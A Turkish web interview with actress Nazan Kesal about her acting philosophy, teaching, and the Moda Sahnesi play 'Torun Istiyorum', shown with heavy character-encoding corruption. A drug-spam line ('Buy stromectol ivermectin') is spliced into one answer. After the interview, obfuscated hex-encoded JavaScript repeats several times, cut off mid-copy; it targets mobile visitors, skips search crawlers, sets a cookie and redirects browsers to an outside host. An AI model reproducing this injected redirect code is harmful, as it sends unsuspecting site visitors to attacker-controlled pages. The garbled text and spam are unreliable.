buradayAi??m, neferinizimai??? dedim. Murat SaraAi??oAYlu da saAY olsun, bende Ai??ok Ai??srar etmiAYti.

SeAi??imlerimizde evet demek kadar hayAi??r demek de kAi??ymetli. Her zaman bu rolA?n bana ihtiyacAi?? var mAi??, benden baAYkasAi?? oynayabilir mi diye seAi??iyorsunuz rollerinizi.
Benim iAi??in oyunculuk bir AYey ezberleyip papaAYan gibi kendimi ekranda gAi??stermek falan deAYil. Benim iAi??in oyunculuk, bu yeryA?zA?ne bir AYey sAi??yleyebilme hali. Fazilet aracAi??lAi??AYAi??yla ben bir AYey sAi??yleyebiliyor muyum? Yani benim de derdime hemhal oluyor mu Fazilet? RolA?n beni Ai??aAYAi??rmasAi?? lazAi??m. Gel, senin enerjine ihtiyacAi?? var demesi lazAi??m; beni kAi??AYkAi??rtmasAi?? lazAi??m; zor olmasAi?? lazAi??m; ters kAi??AYe olmasAi?? lazAi??m; riskli olmasAi?? lazAi??m; ben olmasam o rol eksik kalAi??r dedirtmesi lazAi??m.

Bu rolde de politikacAi??larAi??n hAi??rslarAi??nAi?? Ai??rnek alAi??yorsunuz ve bA?yA?k oynuyorsunuz. Ranini, ai???Televizyon dA?nyasAi??nda teatral oyunculuAYun da iAYe yaradAi??AYAi??nAi?? Nazan Kesal bize gAi??stermiAY olduai??? diye yazmAi??AY.
Televizyon yazarlarAi?? diziyi masaya yatAi??rdAi??klarAi??nda, ekranda bA?yA?k oynamanAi??n iAYe yaramayacaAYAi??nAi?? dA?AYA?nenler, aAi??Ai??p Faziletai??i??e baksAi??n, teatral oyunculuAYun doAYru oynandAi??AYAi??nda ne kadar etkili olabileceAYini biz Faziletai??i??te gAi??rdA?k minvalinde AYeyler yazmAi??AYlar. O doz baAYlangAi??Ai??ta benim Ai??ok zorlandAi??AYAi??m bir dozdu. Ai??A?nkA? sinemada baAYAi??msAi??z filmlerden geldiAYim iAi??in, ekranda da ben gAi??steren AYeyleri Ai??ok sevmiyorum. Sinema bakAi??AYtAi??r Ai??A?nkA? sinema yA?zdA?r. Yani hiAi??bir AYey yapmadan yA?zA?nA?zle bir AYey anlatabilmenizdir. Dizideki varoAY kadAi??nAi??n davranAi??AYlarAi??na ve gestuslarAi??na baktAi??AYAi??nAi??z zaman onu minimalize edecek bir auranAi??n iAi??inde deAYilim ben. Gidin gecekondu mahallesine, hangi kadAi??n hangi enerjisini kA?Ai??A?lterek tutuyor. Ben de referansAi??mAi?? gerAi??eklikten aldAi??AYAi??m iAi??in onu Ai??ok tercih etmediAYim Ai??lAi??A?ye getirmek zorunda kaldAi??m. Edip Canseverai??i??in AYu cA?mlesine gelmiyor mu o zaman? ai???Her insan yaAYadAi??AYAi?? yere benzer. O yerin havasAi??na, suyuna, taAYAi??na, topraAYAi??naai??? Bu AYiir dizesi benim oyunculuAYum iAi??in kAi??lavuz cA?mlemdir.

Mamai??i??Artai??i??da oyunculuk dersleri verdiniz TuAYrul TA?lek ile. Hatta dizideki Afra SaraAi??oAYlu da orada oyunculuk derslerine katAi??ldAi??.
Onun deneyimi yoktu, ilk dizisiydi ve anne kAi??zAi?? oynuyoruz. YanAi??mda biraz Ai??AYrensin, biraz piAYsin istedim Ai??A?nkA? ben de karAYAi??mda biraz cevap veren birini, oyunu alan birini istiyorum.

AyrAi??ca BahAi??eAYehir A?niversitesi’nde, haftada bir gA?n ileri oyunculuk dersi verdiniz. HocalAi??k, Ai??AYretmek, aslAi??nda Ai??AYretirken Ai??AYrenmek sA?reci nasAi??l?
Orada iki yAi??l ders verdim. Bu diziden ve tiyatrodan dolayAi?? oradan ayrAi??ldAi??m. YAi??llardAi??r sinema ve dizi sektAi??rA?nde var olmanAi??n getirdiAYi bir gAi??zlem belki bilmiyorum, genAi??lerin Ai??ok sAi??kAi??AYtAi??AYAi??nAi?? gAi??rA?yorum. Kamera Ai??nA?nde Ai??zgA?r genAi??ler gAi??rmA?yorum. OyunculuAYa kafa yormuAY genAi??ler gAi??rmA?yorum. OrayAi?? sadece artistik patinaj yeri gibi gAi??ren, A?nlA? olmanAi??n bir aracAi?? olarak deAYerlendiren bir enerji gAi??rA?yorum. Ve kendi enerjim ve oyunculuk anlayAi??AYAi??m doAYrultusunda kamera Ai??nA? oyunculuk atAi??lyesi yapmayAi?? dA?AYA?nA?yorum. Nazan Kesal Kamera Ai??nA? Oyunculuk AtAi??lyesi. BurasAi?? asla A?nlA? olmak isteyenlerin geleceAYi bir yer deAYil. Beraberinde oyunculuk ve oyuncu koAi??luAYu da devreye girecek. Biraz iAYin eAYitmenlik kAi??smAi??na soyunmak istiyorum.

Nazan Kesal / Torun Ai??stiyorum

Moda Sahnesiai??i??nde iki sezondur oynadAi??AYAi??nAi??z ai???Torun Ai??stiyorumai???un tekstini Kemal AydoAYan ilk gAi??nderdiAYinde, ai???Bu oyunun bir parAi??asAi?? olursan Ai??ok mutlu olurumai??? demiAY. Siz de okuduktan sonra direkt ai???Bu anneyi ben oynamalAi??yAi??mai??? cevabAi??nAi?? vermiAYsiniz.
Okur okumaz evet dediAYim bir oyun oldu. Ai??yi ki de demiAYim. Benim dA?nyamAi?? deAYiAYtirdi. DolayAi??sAi??yla beni deAYiAYtiren AYeyin, onu izleyen seyirciyi de deAYiAYtireceAYine inanan biriyim. Bu oyunu Ai??mrA?m yettiAYince oynamak istiyorum. KeAYke A?lkenin bu dA?zeni deAYiAYse de bAi??yle oyunlar oynamasak. Bir ihtiyaAi??tan dolayAi?? bu cA?mleyi kuruyorum. Umudumu o kadar da sAi??fAi??rlamayayAi??m. Bu oyunu oynamayacak gA?nleri gAi??rmek istiyorum.

Yazar, Thomas Jonigk aileyi; dehAYetin, vahAYetin, her tA?rlA? toplumsal baskAi??nAi??n hayata geAi??irildiAYi bir burjuva cehennemi olarak Ai??iziyor. Oyun aykAi??rAi?? kiAYileri hizaya sokmak gayretine vurgu yapAi??yor. Oysa ai???normalai??? olmak iAi??in ne Ai??abalar, ne Ai??dA?nler gerekiyor.
Zaten yazarAi??n AYAi??yle bir cA?mlesi var. Benim oyunlarAi??mda eAYer seyirci sAi??kAi??lAi??yorsa, o zaman ben asla baAYarAi??lAi?? deAYilimdir. SAi??kAi??lan bir seyircidense yuhalayan bir seyirciyi tercih ederim. O anlamda Ai??ok banko bir oyun, TA?rkiyeai??i??nin AYu anki yapAi??sAi??na Ai??ok denk dA?AYen bir oyun. Hitlerai??i??in mirasAi??nAi?? yaAYayan Alman toplumunun kendi iAi??indeki aile ai???burjuvaziai??? yani onlarda kilise ve devlet arasAi??ndaki o birbirini doAYuran ve birbirini belirleyen ve topyekAi??n beraberinde tAi??rnak iAi??inde adAi?? ai???faAYizmai??? olan bir yerde yaAYayan adamAi??n eseri bu. Kendi hayatAi??ndan izdA?AYA?mleri var. Tiyatronun kendi diliyle dalga geAi??erek yapAi??yor bunu. Bir parodi de gAi??rebiliyorsunuz oyunda, bir burlesk de gAi??rebiliyorsunuz, vodvil gAi??rebiliyorsunuz, sonra yabancAi??laAYAi??p kopuyorsunuz oyundan, absA?rd bir AYey de gAi??rebiliyorsunuz, grotesk de gAi??rebiliyorsunuz. Tiyatronun o biAi??emine dair bir sA?rA? formatAi??nAi?? bir arada gAi??rebileceAYiniz bir yapAi??sAi?? var oyunun. Ekibimiz AYahane, mA?thiAY bir buluAYma, bu metinle buluAYan bir seyircinin aydAi??nlanmamasAi??nAi??n mA?mkA?n olmayacaAYAi??nAi?? dA?AYA?nA?yorum.

Yazar da A?zerinde oynadAi??AYAi?? bu dille kiAYilerin konuAYamadAi??AYAi??na vurgu yapAi??yor.
Kapitalizmin dili konuAYuyor. Bizler hepimiz birer gAi??lgeyiz aslAi??na. Ai??nsan suretimiz kapitalizmin kendisi olmuAY. Bizi ele geAi??irmiAY kapitalizm. Kimse fakir bir insana A?AYAi??k olmuyor mesela. Kimse ruha A?AYAi??k olmuyor; herkes maddeye A?AYAi??k oluyor. Biz ne kadar korumaya Ai??alAi??AYsak da dA?zen bAi??yle olduAYu iAi??in bizi bir biAi??imiyle ele geAi??irmeye Ai??alAi??AYAi??yor. Biz asgari Ai??lAi??ekte teslim olmuyoruz ona. Bu A?lkenin eAYitim kalitesi ortada, bu insanlar tavlanmaya hazAi??r insanlar ordusu, suskun insanlar ordusu, AYaAYAi??rmayan insanlar ordusu. Ai??A?nkA? bunu isteyen bir A?st akAi??l yok. A?st akAi??l AYunu sAi??ylA?yor bize. SusacaksAi??n, konuAYmayacaksAi??n, itiraz etmeyeceksin, sA?rekli bu dAi??ngA?ye hizmet edeceksin. Yani ruhlarAi??mAi??z betonlaAYtAi??.

Moda sahnesinin prova sA?recini Ai??ok seviyorum ben. Konuyla ilgili kitaplar okunuyor, belgeseller seyrediliyor. Konu Ai??erAi??evesinde beyin fAi??rtAi??nasAi?? yapAi??lAi??yor.
Moda Sahnesiai??i??nin de felsefesinde artistik patinaj yok. BurasAi?? da derdi olan insanlarAi??n bir araya geldiAYi bir tiyatro topluluAYu. SanatAi??n bA?tA?n argA?manlarAi??nAi?? bu toplum yararAi??na nasAi??l dAi??nA?AYtA?rebiliriz derdinde bir ekipmanAi?? var. Yoksa dertleri oyun yapmak deAYil; ai???dertleri olanai??? oyun yapmak. Ben o yA?zden buradayAi??m. Burada olan her AYeyi yA?rekten alkAi??AYlAi??yorum Ai??A?nkA? bu AYehre, bu A?lkeye bence Ai??ok bA?yA?k bir katkAi??sAi?? var. Ai??A?nkA? Ai??ok iyi iAYleyen bir aklAi?? var bu tiyatronun. Kemal AydoAYanai??i??Ai?? var. Sonunda onun entelektA?el dA?nyasAi??ndan sA?zA?lA?p geliyor bu oyunlar. Bu toplumu nasAi??l sarsar, nasAi??l dAi??nA?AYtA?rA?r diye seAi??iyor oyunlarAi??. Bu tercih sebepleri tam da benlik yani.

Bu oyun da on yAi??ldAi??r kafasAi??ndaymAi??AY Kemal AydoAYanai??i??Ai??n.
Evet, ve oynanamama sebepleri de bu oyunu oynayacak kadAi??n oyuncu bulamamalarAi??.

Ai??mrA?nA?zce iyi oyuncu olmak iAi??in mA?cadele ediyorsunuz. OyunculuAYu da ruh iAYAi??iliAYi olarak tanAi??mlAi??yorsunuz. Ai??AYte Ai??dA?lleriniz bunun saAYlamasAi??.
Benim oyunculuAYumda o artistik kAi??sAi??m hiAi?? yok. Onu bile isteye tAi??rpA?ledim. Ai??AY onu biraz kAi??rA?klese de, seyircinin alkAi??AYAi??yla o belirli bir seviyeye Ai??Ai??ksa da, o alkAi??AYAi??n aslAi??nda seyircinin gAi??revi ve ufacAi??k bir Ai??dA?lA? olduAYunu Ai??ok erken yaAYlarda fark ettim. O alkAi??AY bana baAYka bir AYey sAi??ylemiyor. Sen bA?yA?ksA?n demiyor. Onu doAYru okumak lazAi??m. O alkAi??AY iki saatlik performansAi??nAi??n karAYAi??lAi??AYAi??. Ruh iAYAi??iliAYidir oyunculuk benim iAi??in. Biz iAYAi??iyiz aslAi??nda. Bize baAYka tanAi??mlamalar yapan var ama iAYin doAYasAi??na baktAi??AYAi??nda bizim AYu sokaktaki satAi??cAi??dan hiAi??bir farkAi??mAi??z yok. O simit satAi??yorsa ben de burada duygu satAi??yorum aslAi??nda. Ben seyirciyi, girdiAYim rolle bir duygu dA?nyasAi??nAi??n iAi??ine, bir katarsisin iAi??ine sokuyorum. DolayAi??sAi??yla ben biraz doktorluk da yapAi??yorum. BAi??yle garip bir paradoks var yani. Ercan doktor ama kendini oyuncu sanAi??yor. Ben oyuncuyum ama kendimi doktor sanAi??yorum. YaptAi??AYAi??mAi??z AYeyi doAYru kodlarsak eAYer bu iAY bize iyi gelir. Bize iyi gelen, seyirciye iyi gelir. Dalga dalga yayAi??lan bir AYey olur. Ne iAY yapAi??yorsan namusunla yapman lazAi??m.

GeAi??en sene Ai??zmir BA?yA?kAYehir Belediyesi tarafAi??ndan dA?zenlenen 16. Sinema Burada Festivaliai??i??nde aldAi??AYAi??nAi??z Onur Ai??dA?lA?ai??i??nA? de mesleAYe baAYlamanAi??zda Ai??nA?nA?zA? aAi??an amcanAi??z Yunus KAi??rAi??lmAi??AYai??i??a ithaf ediyorsunuz.
Buy stromectol ivermectin Ai??A?nkA? benim olma sebebim aslAi??nda o. Ona ve kaybettiAYim diAYer amcama Ai??ok AYey borAi??luyum. Yani o Ai??dA?l yine benim Ai??ocukluAYuma gitti. BaAYa dAi??ndA?k bakAi??n.

Ai??ok teAYekkA?r ederim. Ne iyi geldiniz.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( 